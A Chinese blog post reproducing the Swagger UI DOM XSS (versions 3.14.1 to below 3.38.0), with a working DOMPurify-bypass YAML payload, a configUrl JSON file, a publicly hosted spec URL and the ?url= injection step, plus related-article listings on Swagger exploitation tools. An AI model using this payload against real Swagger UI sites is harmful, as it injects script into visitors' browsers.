swagger xss漏洞复现

已于 2024-06-19 15:56:58 修改
阅读量838 收藏 1
点赞数 5
分类专栏: 挖洞 文章标签: xss 渗透
于 2024-04-26 17:35:26 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_70137901/article/details/138225336
版权

swagger xss漏洞复现

文章目录

漏洞介绍

Swagger UI 有一个有趣的功能,允许您提供 API 规范的 URL - 一个 yaml 或 json 文件,将被获取并显示给用户
根本原因非常简单 - 一个过时的库DomPurify

影响版本

XSS 影响的 Swagger UI 版本:>=3.14.1 < 3.38.0

实现原理

利用允许提供json文件的原理访问公网网站进行弹窗
json网站:https://jumpy-floor.surge.sh/test.yaml
拼接方式
?url=https://your_api_spec/spec.yaml
?configUrl=https://your_api_spec/file.json

yaml配置文件

swagger: '2.0'
info:
  title: Example yaml.spec
  description: |
    <math><mtext><option><FAKEFAKE><option></option><mglyph><svg><mtext><textarea><a title="</textarea><img src='#' οnerrοr='alert(document.head)'>">
paths:
  /accounts:
    get:
      responses:
        '200':
          description: No response was specified
      tags:
        - accounts
      operationId: findAccounts
      summary: Finds all accounts

json文件配置

{
    "url": "http://IP/test.yaml",
    "urls": [
        {
            "url": "http://IP/test.yaml",
            "name": "Foo"
        }
    ]
}

漏洞复现

随机找一位受害者访问
在这里插入图片描述
进行拼接?url=https://jumpy-floor.surge.sh/test.yaml
在这里插入图片描述
弹窗

修复建议:

升级到最新

抠脚大汉在网络
关注
  • 5
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
swagger修复建议(Swagger接口泄露漏洞修复)
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
05-16 7601
目前遇到无法生成swagger的问题,总结了两种原因及解决方案,原因可能是接口缺少http属性和命名冲突。Swagger是一种用于描述API的开源框架,它使用OpenAPI规范来定义API的端点、请求、响应、模式等。Swagger接口泄露漏洞是指在使用Swagger描述API时,由于未正确配置访问控制或未实施安全措施,导致API接口被不授权的人员访问和利用,从而导致系统安全风险。
swagger开启身份认证
04-08
swagger开启身份认证,解决未授权登录、敏感信息泄露等漏洞
渗透测试——漏洞扫描工具
wuli1024的博客
11-20 374
然后还要将all这个压缩包里的plugin_feed_info.inc提取出来,命令行是 tar -zxvf all-2.0.tar.gz plugin_feed_info.inc,然鹅,我提取不出来。将下载好的插件移动到Nessus目录下,然后输入sudo /opt/nessus/sbin/nessuscli update all-2.0.tar.gz。用户名和密码随便写写就好,随后将会更新补丁,OK,这样Nessus可以使用了。将会获得一串数字,然后去激活码的这个网站,输入自己的邮箱获取激活码。
spring boot集成swagger,自定义注解,拦截器,xss过滤,异步调用,定时任务案例...
weixin_33859665的博客
10-21 350
本文介绍spring boot集成swagger,自定义注解,拦截器,xss过滤,异步调用,定时任务案例 集成swagger--对于做前后端分离的项目,后端只需要提供接口访问,swagger提供了接口调用测试和各种注释的可视化web界面。配置swagger的扫描包路径,api信息等,见配置类SwaggerConfig。项目中遇到的下列注解都由swagger提供:   @Api、@ApiOpera...
Swagger-UI 反射型 XSS
最新发布
2401_84466325的博客
06-16 798
Swagger UI 的入口页面,是一个用于与API进行交互和可视化的工具。Swagger UI 是一个开源项目,提供了一个直观的用户界面来查看API文档,并允许用户直接从文档中发送请求,查看响应,从而测试和调试API,可以通过看到有关更多的XSS漏洞
swagger-exp:Swagger API漏洞利用
03-25
Swagger API漏洞利用 这是一个Swagger REST API信息可用的工具。主要功能有: 遍历所有API接口,自动填充参数 尝试GET / POST所有接口,返回响应代码/ Content-Type / Content-Length,用于分析接口是否可以未授权访问利用 分析接口是否存在敏感参数,例如url参数,容易约会外网的SSRF细分 检测API认证绕过防御 在本地监听一个Web服务器,打开Swagger UI接口,供分析接口使用 使用Chrome打开本地Web服务器,并添加CORS,解决部分API接口无法跨域请求的问题 当工具检测到HTTP认证绕过突破时,本地服务器拦截API文档,修改路径,踩直接在Swagger UI中进行测试 扫描器改进建议 分析json文档,将发现的URL,自动添加到爬虫中 用法 需要介入分析api_summary.txt文件中的内容 扫描所有API集
Swagger API漏洞利用-JavaScript开发
05-26
Swagger API Exploit 这是一个 Swagger REST API 信息泄露利用工具。 主要功能有: 遍历所有API接口,自动填充参数 尝试 GET / POST 所有接口,返回 Response Code / Content-Type / Content-Length ,用于分析接 Swagger API Exploit 这是一个 Swagger REST API 信息泄露利用工具。 主要功能有: 遍历所有API接口,自动填充参数 尝试 GET / POST 所有接口,返回 Response Code / Content-Type / Content-Length ,用于分析接口是否可以未授权访问利用 分析接口是否存在敏感参数,例如url参数,容易引入外网的SSRF漏洞 检测 API认证绕过漏洞 在本地监听一个Web Server,打开Swagger UI界面,供分析接口使用 使用Chrome打开本地Web服务器,并禁用CORS,解决部分API接口无法跨域请求的问题 当工具检测到HTTP认证绕过漏洞时,本地服务器拦截API文档,修改path,以便直接在Swagger
Swagger被曝高危漏洞,对Html、PHP、Java和 Ruby等开发应用都有影响
weixin_34245082的博客
08-09 1929
Swagger是一个规范且完整的框架,提供描述、生产、消费和可视化RESTful Web Service,今年年初被重命名为OpenAPI。Swagger规格被广泛的使用在Html、PHP、Java和 Ruby等流行语言开发的应用中,其最近被曝出远程代码执行漏洞,潜在影响到了Java、PHP、NodeJS和 Ruby等流行语言开发的应用。 ...
检查出swagger漏洞,建议直接用@ConditionalOnExpression注解禁用swagger
七亿少女的梦
08-06 1万+
最开始在生产环境中是这样关闭swaggerswagger主页不能访问了,接口也没暴露,但是漏洞报告还是来了 不知道这个有什么漏洞,所以干脆生成环境把整个swagger都禁用了,就不会有这些了 在swagger配置文件上加上 @ConditionalOnExpression("${swagger.onlion:true}") 然后在properties文件里面加上配置 因为wagger配置文件里面配置的等于true才会启用这个配置,所以swagger.onlion=...
Swagger转JMeter脚本工具
05-24
Swagger转JMeter脚本工具是一种高效实用的自动化测试解决方案,它能够帮助IT专业人士将基于Swagger定义的RESTful API接口快速转换成JMeter测试脚本。Swagger是一个流行的API设计框架,用于构建、文档化和测试RESTful...
swagger官方文档离线版
10-26
Swagger官方文档离线版是开发人员和团队在不依赖互联网连接的情况下查阅Swagger 2.0规范的重要资源。Swagger是一个流行的API开发工具,它基于OpenAPI Specification(以前称为Swagger specification),用于设计、...
swagger-hack:自动化爬取并自动测试所有swagger-ui.html显示的接口
03-05
招摇 在测试中偶尔会碰到swagger附加的常见的对齐方式: 有的同轴接口特别多,每一个都手动去试根本试不过来随后用python写了个脚本自动爬取所有接口,配置好传参发包访问 原理是首先抓取获取到一些标准和对应的文档地址而后对每个标准下的接口文档进行解析,构造请求包,获取响应 尽量考虑到了所有可能的传参格式,实际测试只有少数几个会500或400响应需要手动修改一下,其余都是401或200 200就是未授权访问接口了,可以进一步做其他诸如sqli等测试运行时然后: 所有测试结果都存储在csv中: 欢迎大家关注稻草人安全团队,后续有更多技术文章,工具分享等
Swagger ui接口自动化批量漏洞测试
good good study
11-16 8776
经常发现Swagger ui(swagger-ui是将api接口进行可视化展示的工具)接口泄露,如下,在这个页面中暴露了目标站点中所有的接口信息,所以可以对这个接口进行漏洞测试,看是否存在未授权访问、sql注入、文件上传等漏洞
一文解决:Swagger API 未授权访问漏洞问题
热门推荐
LiamHong_的博客
10-27 2万+
是一个用于设计、构建、文档化和使用风格的 Web 服务的开源软件框架。它通过提供一个交互式文档页面,让开发者可以更方便地查看和测试 API 接口。然而,在一些情况下,未经授权的访问可能会导致安全漏洞。本文将介绍如何解决问题。
Swagger REST API 信息泄露利用工具-swagger-exp
siu~
12-27 1607
这是一个 Swagger REST API 信息泄露利用工具。 主要功能有: 遍历所有API接口,自动填充参数 尝试 GET / POST 所有接口,返回 Response Code / Content-Type / Content-Length ,用于分析接口是否可以未授权访问利用 分析接口是否存在敏感参数,例如url参数,容易引入外网的SSRF漏洞 检测 API认证绕过漏洞 在本地监听一个Web Server,打开Swagger UI界面,供分析接口使用 使用Chrome打开本地Web服务器,并禁用C
swagger 未授权访问漏洞修复,这可能是你看到的最好的解决方案!
记录点滴
09-26 1万+
大多数人都是直接禁用swagger,这样一来就给开发人员带来了负担,因为需要解决接口文档的问题,相信大家用惯了swagger文档,都不愿意自己再去手动写接口文档了。swagger未授权访问主要的路径如下,根据版本不同或者自定义的路径,可能会有一定的差异,自定义路径的只需要把自己的路径添加进来即可。通过以上方式,即解决了swagger未授权访问的问题,又解决了通过token授权访问的问题!怎样才能方便的修复未授权访问的漏洞,同时又能通过验证正常访问swagger文档呢?的方式对请求进行验证,
Swagger接口泄露漏洞修复
weixin_35749545的博客
12-19 7082
Swagger是一种用于描述API的开源框架,它使用OpenAPI规范来定义API的端点、请求、响应、模式等。Swagger接口泄露漏洞是指在使用Swagger描述API时,由于未正确配置访问控制或未实施安全措施,导致API接口被不授权的人员访问和利用,从而导致系统安全风险。 为了修复Swagger接口泄露漏洞,可以采取以下措施: 设置访问控制:通过设置访问控制,可以确保只有授权的人员能够访问A...
寒假学习第二天----批量刷Swagger未授权访问漏洞_swagger1
2401_83621661的博客
04-16 528
Swagger是一种用于设计、构建和文档化RESTful Web服务的开源框架。它提供了一种规范和工具集,可以帮助开发人员定义、构建、测试和文档化API。使用Swagger,开发人员可以使用简单易读的格式(比如YAML或JSON)编写API规范,描述API的路径、操作、参数、响应等信息。Swagger可以根据这些规范生成交互式API文档,使得其他开发人员可以轻松地了解和使用API。
Swagger接口泄露漏洞风险
weixin_42581846的博客
12-19 3937
Swagger是一种用于描述API的工具,它可以使用OpenAPI规范来描述API的结构和功能。Swagger可以帮助开发人员更快地设计、测试和使用API,因此被广泛使用。 然而,如果没有适当的安全措施,Swagger可能会导致接口泄露漏洞。这意味着,攻击者可能会利用Swagger文档中提供的信息来攻击API或获取敏感信息。 为了避免这种风险,应该采取以下措施: 不要在Swagger文档中包含敏...
swagger漏洞分析
09-27
Swagger漏洞是指Swagger UI版本中存在的XSS(跨站脚本攻击)漏洞。具体来说,该漏洞是由于Swagger UI使用了过时的库DomPurify并允许由查询参数控制的DOM型XSS所导致的。Swagger UI是一个允许API交互和可视化的库,并允许您向API规范提供一个URL,该URL指向一个yaml或json文件,然后将其获取并显示给用户。攻击者可以利用这个漏洞通过特制的查询参数注入恶意脚本,从而在用户浏览Swagger UI页面时执行恶意代码。 修复这个漏洞的方法是升级Swagger UI的版本至大于等于3.38.0。新版本中已经更新了DomPurify库并修复了这个漏洞

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值